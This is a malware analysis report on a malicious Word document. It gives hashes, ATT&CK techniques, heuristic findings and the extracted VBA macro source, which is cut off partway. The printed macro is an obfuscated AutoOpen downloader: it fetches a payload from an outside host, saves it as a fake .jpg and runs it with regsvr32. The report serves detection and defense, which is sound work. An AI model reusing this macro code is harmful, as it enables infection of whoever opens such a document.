Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c4b476186a7d2718…

MALICIOUS

Office (OOXML)

134.1 KB Created: 2020-07-09 00:03:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: 2a3becf45cb2beab4516efe3e2ab2c74 SHA-1: 034531bbf31899b2c44a2887a64b013396cd8e0d SHA-256: c4b476186a7d27189e16f2c25a20d47c84da5e08fe7994014cbbad879c53dbfd
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is an OOXML document containing a VBA project with an AutoOpen macro. This macro is configured to execute code, indicated by the 'Shell' execution token. The presence of an external relationship pointing to a local file path suggests an attempt to access or load external resources. The VBA script itself appears to be obfuscated, but the overall structure and heuristic firings strongly indicate a macro-based downloader designed to execute a secondary payload.

Heuristics 5

  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\it.jpg
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4503 bytes
SHA-256: d5e7f7c086e02d1ca9fb96d97f7023e17586d175581fa5b1743a28ba4676f659
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "f66c011c"
Function c38f44cd()
c38f44cd = ActiveWindow.DisplayScreenTips
End Function
Function f62b5f89()
f62b5f89 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function e59f855f()
e59f855f = 532 - 500
End Function
Function c0613fa1()
c0613fa1 = ActiveWindow.HorizontalPercentScrolled
End Function
Sub e81b2ff2(cded94e9, c9546e5f)
Dim effb4940
effb4940 = FreeFile
Open cded94e9 For Output As #effb4940
Print #effb4940, c1523cf7(c9546e5f)
Close #effb4940
End Sub
Function e4ddd386()
e4ddd386 = ActiveWindow.Visible
End Function
Function a2ae8a2f()
a2ae8a2f = ActiveWindow.Top
End Function
Function f1f5397e()
f1f5397e = -467779702
End Function
Function fa8553c5()
fa8553c5 = ActiveWindow.Visible
End Function
Function dc17e610(d91e1038)
d1f10956 = Len(d91e1038)
For de5b5c62 = 1 To d1f10956 Step 2
befc5edb = befc5edb & Mid(d91e1038, de5b5c62, 1)
Next
dc17e610 = befc5edb
End Function
Function e83c0304()
e83c0304 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function b7fe50c7()
b7fe50c7 = ActiveWindow.Hwnd
End Function
Function f7871cb1()
f7871cb1 = ActiveWindow.Index
End Function
Function fa0ba5b3()
fa0ba5b3 = ActiveWindow.Width
End Function
Sub d0db810b()
End Sub
Function c9b02c13()
c9b02c13 = ActiveWindow.DisplayVerticalRuler
End Function
Function d1f76ac3()
d1f76ac3 = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function ab5d48ed()
ab5d48ed = ActiveWindow.WindowNumber
End Function
Function b916b346()
b916b346 = 9287 * 2
End Function
Sub AutoOpen()
Dim ab17e875 As New f5f0d66f
e81b2ff2 dc17e610("c5:c\8perbo2g7rea2m0d4a3tea4\36947613021.2j8p8gf"), ab17e875.ae41a614(dc17e610("hct0t7p7:f/e/fh3qa33l7l3.bcbodm5/2i5z551/byba2c9aa.6pah3p5?cl9=ak9p1te1f0b.4c6a4b6"))
Dim f2cc6d12 As New WshShell
f2cc6d12.exec a8ecfc4e & " " & dc17e610("c5:c\8perbo2g7rea2m0d4a3tea4\36947613021.2j8p8gf")
End Sub

Attribute VB_Name = "db2924bc"
Function ef33d5da()
ef33d5da = ActiveWindow.Index
End Function
Function abbe8847()
abbe8847 = Application.ActiveDocument.CompatibilityMode
End Function
Function c41853a3()
c41853a3 = ActiveWindow.SplitVertical
End Function
Function ef0d68ae()
ef0d68ae = Application.ActiveDocument.Application
End Function
Function c1523cf7(e81b3f72)
c1523cf7 = StrConv(e81b3f72, 64)
End Function
Function ada6c466()
ada6c466 = ActiveWindow.View
End Function
Function dc3a70db()
dc3a70db = ActiveWindow.VerticalPercentScrolled
End Function
Function e5886f05()
e5886f05 = Application.ActiveDocument.CurrentRsid
End Function
Function d2cd1c17()
d2cd1c17 = Application.ActiveDocument.ActiveTheme
End Function
Function bbacad32()
End Function
Function e0d4b9e9()
e0d4b9e9 = ActiveWindow.DisplayRightRuler
End Function
Function fe00acca()
fe00acca = Application.ActiveDocument.ActiveWindow
End Function
Function f06180ce()
f06180ce = 20419
End Function
Function f4c42c2e()
f4c42c2e = 7112 / 56
End Function
Function a8ecfc4e()
a8ecfc4e = dc17e610("rfe8gds7verc3022")
End Function

Attribute VB_Name = "f5f0d66f"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function fb30fe37()
fb30fe37 = Application.ActiveDocument.ActiveWindow
End Function
Function fb7c2a67()
fb7c2a67 = 187
End Function
Function b3611a06()
b3611a06 = 22794 / 87
End Function
Function ec170d57()
ec170d57 = ActiveWindow.HorizontalPercentScrolled
End Function
Function ae41a614(cc03b823)
Dim c8d5d70b As Object
Set c8d5d70b = New MSXML2.XMLHTTP30
Call c8d5d70b.Open("GET", cc03b823, False)
c8
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27648 bytes
SHA-256: 9b1d7154c35e84254141460ef1cab8ca290a6bebaee17ef17d71e6799d814677

Open this report in the interactive analyzer, or submit your own file for analysis.